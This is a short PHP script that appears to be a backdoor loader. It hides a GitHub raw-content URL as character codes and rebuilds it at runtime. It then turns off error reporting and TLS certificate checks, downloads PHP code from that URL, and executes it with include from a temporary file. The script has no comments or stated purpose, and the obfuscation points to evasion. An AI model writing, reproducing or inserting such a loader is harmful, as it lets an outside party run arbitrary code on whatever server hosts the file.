<?php
$char_codes = [
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46,
    103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111,
    110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 108, 117,
    102, 102, 121, 111, 112, 109, 47, 111, 112, 109, 47, 114,
    101, 102, 115, 47, 104, 101, 97, 100, 115, 47, 109, 97,
    105, 110, 47, 50, 46, 112, 104, 112
];

$url = '';
foreach ($char_codes as $code) {
    $url .= chr($code);
}

set_error_handler(function($errno, $errstr) {
    return true;
});

try {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_FOLLOWLOCATION => 1,
            CURLOPT_TIMEOUT => 8,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        
        $response = curl_exec($ch);
        if ($response && curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
            $tmp = tmpfile();
            fwrite($tmp, $response);
            $path = stream_get_meta_data($tmp)['uri'];
            include $path;
            fclose($tmp);
        }
        curl_close($ch);
    }
} catch (Exception $e) {
}

restore_error_handler();
?>
